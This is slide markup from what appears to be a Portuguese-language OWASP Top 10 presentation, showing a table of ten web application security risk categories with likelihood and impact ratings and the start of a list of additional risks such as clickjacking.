          <p:cNvPr id="65" name="Text Placeholder 64"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:style>
          <a:lnRef idx="0">
            <a:schemeClr val="accent4"/>
          </a:lnRef>
          <a:fillRef idx="3">
            <a:schemeClr val="accent4"/>
          </a:fillRef>
          <a:effectRef idx="3">
            <a:schemeClr val="accent4"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>+F</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="68" name="Table 67"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="563925590"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="2438400"/>
          <a:ext cx="6857999" cy="4066502"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1066800"/>
                <a:gridCol w="838200"/>
                <a:gridCol w="900890"/>
                <a:gridCol w="1137523"/>
                <a:gridCol w="1061688"/>
                <a:gridCol w="1061688"/>
                <a:gridCol w="791210"/>
              </a:tblGrid>
              <a:tr h="881612">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>RISCO</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="0"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endParaRPr lang="en-US" sz="1000" b="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endParaRPr lang="en-US" sz="1000" b="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000" b="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a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="1000" b="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endParaRPr lang="en-US"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318489">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mj-lt"/>
                        </a:rPr>
                        <a:t>A1-Injeção</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mj-lt"/>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900" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Específico </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Apl.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" b="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b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>FÁCIL</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1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>COMUM</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dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>MÉDIA</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dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>SEVERO</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900" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Específico </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Apl.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" b="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18489">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mj-lt"/>
                        </a:rPr>
                        <a:t>A2-Autenticação</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mj-lt"/>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900" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Específico </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Apl.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" b="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b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>MÉDIA</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baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>GENERALIZADA</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1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>MÉDIA</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dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>SEVERO</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900" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Específico </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Apl.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" b="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18489">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mj-lt"/>
                        </a:rPr>
                        <a:t>A3-XSS</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mj-lt"/>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900" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Específico </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Apl.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" b="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b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>MÉDIA</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baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>MUITO DIFUNDIDA</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FF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>FÁCIL</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1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>MODERADO</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900" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Específico </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Apl.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" b="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18489">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mj-lt"/>
                        </a:rPr>
                        <a:t>A4-Ref. Insegura</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mj-lt"/>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900" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Específico </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Apl.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" b="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b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>FÁCIL</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1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>COMUM</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dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>FÁCIL</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1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>MODERADO</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900" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Específico </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Apl.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" b="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18489">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mj-lt"/>
                        </a:rPr>
                        <a:t>A5-Conf.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mj-lt"/>
                        </a:rPr>
                        <a:t> Incorreta</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mj-lt"/>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1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Específico </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Apl.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" b="0" dirty="0" smtClean="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b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>FÁCIL</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1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>COMUM</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dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>FÁCIL</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1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>MODERADO</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1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Específico </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Apl.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" b="0" dirty="0" smtClean="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18489">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mj-lt"/>
                        </a:rPr>
                        <a:t>A6-Exp. de </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mj-lt"/>
                        </a:rPr>
                        <a:t>Dados</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mj-lt"/>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900" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Específico </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Apl.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" b="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b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>DIFÍCIL</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1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>RARA</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1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>MÉDIA</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dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>SEVERO</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900" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Específico </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Apl.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" b="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18489">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mj-lt"/>
                        </a:rPr>
                        <a:t>A7-Cont. Acesso</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mj-lt"/>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900" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Específico </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Apl.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" b="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b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>FÁCIL</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1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>COMUM</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dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>MÉDIA</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dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>MODERADO</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900" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Específico </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Apl.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" b="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18489">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mj-lt"/>
                        </a:rPr>
                        <a:t>A8-CSRF</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mj-lt"/>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900" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Específico </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Apl.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" b="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b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>MÉDIA</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baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>COMUM</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dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>FÁCIL</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1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>MODERADO</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900" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Específico </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Apl.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" b="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18489">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mj-lt"/>
                        </a:rPr>
                        <a:t>A9-Comp. Vulner.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mj-lt"/>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900" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Específico </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Apl.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" b="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b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>MÉDIA</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baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>GENERALIZADA</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1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>DIFÍCIL</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1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>MODERADO</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900" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Específico </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Apl.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" b="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18489">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mj-lt"/>
                        </a:rPr>
                        <a:t>A10-Redirecion.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mj-lt"/>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900" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Específico </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Apl.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" b="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b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>MÉDIA</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1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>RARA</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1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>FÁCIL</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1"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1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>MODERADO</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sz="900" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Específico </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Apl.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" b="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859560264"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="6553200"/>
          <a:ext cx="6858000" cy="2590800"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="6858000"/>
              </a:tblGrid>
              <a:tr h="359606">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0"/>
                        <a:t>Riscos Adicionais a Considerar</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="+mj-lt"/>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r h="22311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aseline="0" dirty="0" smtClean="0"/>
                        <a:t>O Top 10 cobre um terreno bem amplo, mas há muitos outros riscos que você deve considerar e avaliar em sua organização. Alguns destes estavam presentes nas versões anteriores do Top 10, e outros não, incluindo novas técnicas de ataque que são identificadas a todo momento. Outros importantes riscos de segurança em aplicações  (em ordem alfabética) que você deve considerar incluem:</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="11430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900" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>Clickjacking</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" baseline="0" dirty="0" smtClean="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="11430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900" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>Concurrency Flaws</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" baseline="0" dirty="0" smtClean="0"/>
                    </a:p>
